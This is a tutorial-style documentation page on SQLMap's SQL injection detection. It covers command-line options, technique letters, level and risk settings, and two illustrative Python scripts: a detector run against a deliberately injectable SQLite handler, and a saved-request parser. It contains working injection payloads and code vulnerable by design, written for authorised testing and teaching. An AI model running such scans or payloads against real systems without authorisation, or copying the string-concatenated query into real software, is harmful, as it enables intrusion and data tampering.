Vulnerability Detection
Learn about SQLMap's vulnerability detection capabilities
SQLMap provides powerful capabilities for detecting SQL injection vulnerabilities in web applications. This section covers the core detection features and how to optimize them for your specific testing scenarios.
Understanding SQLMap's Detection Process
SQLMap employs a systematic approach to detect SQL injection vulnerabilities:
- Parameter Analysis: SQLMap enumerates the injectable parameters of the target (URL query parameters, POST body fields, cookies and, at higher levels, HTTP headers)
- Payload Injection: It sends crafted payloads for each parameter, designed to trigger DBMS errors, changes in the page content, or time delays
- Response Analysis: It compares every response against the baseline response, looking at content, status and timing
- Confirmation: It repeats and cross-checks the tests (for example, paired true and false conditions must split the responses consistently) before reporting a parameter as injectable, which keeps false positives low
Basic Detection Example
sqlmap -u "http://vulnerable-website.com/page?id=1" --batch
When executed, SQLMap will:
- Test the `id` parameter for every supported injection type
- Automatically determine the database management system (DBMS)
- Report detailed findings about any vulnerabilities discovered
Detection Capabilities
SQLMap can detect a wide range of SQL injection vulnerabilities:
| Injection Type | `--technique` letter | Description | Detection Method |
|---|---|---|---|
| Boolean-based blind | B | Uses true/false conditions to extract data one bit at a time | Compares the responses to a true condition and a false condition against the baseline page |
| Time-based blind | T | Uses conditional time delays to infer data | Measures response time variations and re-tests, since network jitter alone can mimic a delay |
| Error-based | E | Extracts data through verbose DBMS error messages | Looks for DBMS-specific error strings in the response |
| UNION query-based | U | Uses the UNION operator to append a query under the attacker's control | Determines the column count (ORDER BY / NULL columns), then checks that a marker value is reflected in the page |
| Stacked queries | S | Executes additional statements after a `;` | Tests whether a second statement runs, usually through a time delay, because its output is not reflected |
| Inline queries | Q | Embeds a subquery inside the original statement | Checks the page for the subquery's reflected result |
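To make the detection process and the table above concrete, here is an added example that re-implements three of the detectors (error-based, boolean-based blind with a confirmation step, and UNION-based with column counting) against a constructed, deliberately injectable SQLite page handler. This is illustrative code written for this page, not sqlmap's own source; the `vulnerable_target`, `safe_target`, `scan` functions, the product table and the short error-signature list are all assumptions made for the example. Time-based blind and stacked queries are not shown because in-memory SQLite has no SLEEP and the Python driver refuses multiple statements per call.

```python
import re
import secrets
import sqlite3

# Constructed target for this example: an in-memory SQLite "web application"
# whose id parameter is concatenated straight into the query, so it is
# injectable by design. In a real scan, fetch() would be an HTTP request.
_db = sqlite3.connect(":memory:")
_db.executescript(
    "CREATE TABLE products (id INTEGER, name TEXT);"
    "INSERT INTO products VALUES (1, 'Widget'), (2, 'Gadget');"
)


def _render(rows):
    return "<html>Product: " + (", ".join(str(r[0]) for r in rows) or "none") + "</html>"


def vulnerable_target(id_value: str) -> str:
    """Hypothetical page handler: body of the page for ?id=<id_value>."""
    try:
        return _render(_db.execute(f"SELECT name FROM products WHERE id={id_value}").fetchall())
    except sqlite3.Error as exc:
        return f"<html>Database error: {exc}</html>"


def safe_target(id_value: str) -> str:
    """Same page with a parameterised query; the scan should report nothing."""
    try:
        return _render(_db.execute("SELECT name FROM products WHERE id=?", (int(id_value),)).fetchall())
    except (sqlite3.Error, ValueError):
        return _render([])


# A few DBMS error fingerprints (assumed set for the example); a real scanner carries many more.
DBMS_ERRORS = {
    "SQLite": re.compile(r'unrecognized token|near ".*?": syntax error'),
    "MySQL": re.compile(r"You have an error in your SQL syntax"),
    "PostgreSQL": re.compile(r"syntax error at or near"),
    "Microsoft SQL Server": re.compile(r"Unclosed quotation mark"),
}


def detect_error_based(fetch, value):
    """Break the query with a lone quote and look for a DBMS error string."""
    body = fetch(value + "'")
    return next((dbms for dbms, pat in DBMS_ERRORS.items() if pat.search(body)), None)


def detect_boolean_blind(fetch, value, rounds=3):
    """Confirmation step: several true/false pairs must all split the responses
    the same way (true == baseline, false != baseline); one lucky hit is not enough."""
    baseline = fetch(value)
    for n in range(1, rounds + 1):
        true_body = fetch(f"{value} AND {n}={n}")
        false_body = fetch(f"{value} AND {n}={n + 1}")
        if true_body != baseline or false_body == baseline:
            return False
    return True


def detect_union(fetch, value, max_columns=10):
    """Find the column count with ORDER BY n, then check that a marker injected
    through UNION ALL SELECT is reflected in the page."""
    baseline = fetch(value)
    columns = 0
    for n in range(1, max_columns + 1):
        if fetch(f"{value} ORDER BY {n}") != baseline:  # an out-of-range column changes the page
            break
        columns = n
    if columns == 0:
        return None
    marker = secrets.token_hex(8)
    select_list = ", ".join([f"'{marker}'"] + ["NULL"] * (columns - 1))
    body = fetch(f"{value} UNION ALL SELECT {select_list}")
    return columns if marker in body else None


def scan(fetch, value="1"):
    """Run each detector in turn and collect the confirmed findings."""
    findings = {}
    dbms = detect_error_based(fetch, value)
    if dbms:
        findings["error-based"] = dbms
    if detect_boolean_blind(fetch, value):
        findings["boolean-based blind"] = True
    columns = detect_union(fetch, value)
    if columns:
        findings["UNION query-based"] = columns
    return findings


if __name__ == "__main__":
    print("vulnerable:", scan(vulnerable_target))
    print("safe:", scan(safe_target))
```

The point to take from `detect_boolean_blind` is the confirmation logic: a single differing response is not evidence, because dynamic content (timestamps, ads, CSRF tokens) also changes between requests. Real scanners additionally strip such dynamic regions before comparing, which is why sqlmap fetches the baseline page more than once.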
Key Detection Parameters
SQLMap offers several parameters to control the detection process:
sqlmap -u "http://example.com/page?id=1" --level=3 --risk=2 --technique=BEU
This command:
- Sets test thoroughness to level 3: level 1 (the default) tests GET and POST parameters, level 2 adds Cookie values, and level 3 adds the User-Agent and Referer headers along with more payload variants
- Sets risk to 2: risk 1 (the default) already includes the standard time-based tests; risk 2 adds heavy-query time-based payloads, and risk 3 would add OR-based boolean payloads that can modify data when the injection lands in an UPDATE or DELETE statement
- Restricts testing to the Boolean-based blind (B), Error-based (E) and UNION query-based (U) techniques; the remaining letters are T (time-based blind), S (stacked queries) and Q (inline queries)
In This Section
- Test Intensity - Learn how to control the intensity and risk level of SQLMap scans
- Injection Techniques - Explore the various SQL injection techniques supported by SQLMap
- Optimizing Detection - Discover methods to optimize and fine-tune the detection process
Real-World Detection Scenario
In a penetration testing engagement, you might encounter a login form that appears secure. Here's how you might approach it with SQLMap:
# Capture the login request with a proxy tool and save to login.txt
sqlmap -r login.txt --level=5 --risk=3 --batch
This approach:
- Tests every parameter in the saved request (POST body fields, cookies and headers), replaying the captured session cookies and headers as they were
- Uses the highest level of thoroughness, so expect many more requests per parameter than the default
- Employs the most aggressive payloads: risk 3 adds OR-based tests that can alter or delete rows if the injected value reaches an UPDATE or DELETE statement, so use it only where the engagement's rules of engagement allow it
- Runs automatically: --batch answers every interactive prompt with its default, so review those defaults (for example, by default SQLMap stops testing other parameters once one is found injectable)
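The two commands above differ mainly in which parameters get tested, which is what `--level` controls when SQLMap reads a saved request with `-r`. The following added example (illustrative code for this page, not sqlmap's implementation) parses a constructed `login.txt`-style capture and lists the injection points a scanner would consider at each level, using the level semantics described above: GET/POST at level 1, cookies at level 2, User-Agent and Referer at level 3, and the Host header at level 5. The request, hostname and values are made up; `parse_request` and `injection_points` are names chosen for the example.

```python
from urllib.parse import parse_qsl, urlsplit

# Constructed capture of a login request, in the raw HTTP format a proxy
# saves and that sqlmap -r reads. Hostname and values are made up.
LOGIN_REQUEST = """\
POST /login?next=%2Faccount HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Referer: http://example.com/login
Cookie: session=abc123; theme=dark
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=admin&password=secret
"""


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body.strip()}


def injection_points(request: dict, level: int = 1) -> list:
    """(place, name, value) triples that get tested at a given --level.

    Level 1: GET and POST parameters. Level 2: also Cookie values.
    Level 3: also User-Agent and Referer. Level 5: also Host.
    Levels 4 and 5 otherwise add payload and boundary variants rather than
    new parameters, which this function does not model.
    """
    points = []
    query = urlsplit(request["path"]).query
    points += [("GET", k, v) for k, v in parse_qsl(query, keep_blank_values=True)]
    points += [("POST", k, v) for k, v in parse_qsl(request["body"], keep_blank_values=True)]
    headers = request["headers"]
    if level >= 2 and "cookie" in headers:
        for pair in headers["cookie"].split(";"):
            name, _, value = pair.strip().partition("=")
            points.append(("Cookie", name, value))
    if level >= 3:
        for name in ("user-agent", "referer"):
            if name in headers:
                points.append(("Header", name, headers[name]))
    if level >= 5 and "host" in headers:
        points.append(("Header", "host", headers["host"]))
    return points


if __name__ == "__main__":
    request = parse_request(LOGIN_REQUEST)
    for level in (1, 2, 3, 5):
        names = [f"{place}:{name}" for place, name, _ in injection_points(request, level)]
        print(f"--level={level}: {len(names)} injection points -> {', '.join(names)}")
```

Running it shows why `--level=5` is so much noisier than the default on a login form: the request count grows with the number of injection points times the number of payloads per technique, and every cookie and header value becomes a candidate. If only the form fields matter, `-p username,password` keeps the scan focused even at a high level.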
By mastering SQLMap's vulnerability detection capabilities, you can efficiently identify SQL injection vulnerabilities in web applications while minimizing false positives and unnecessary server load.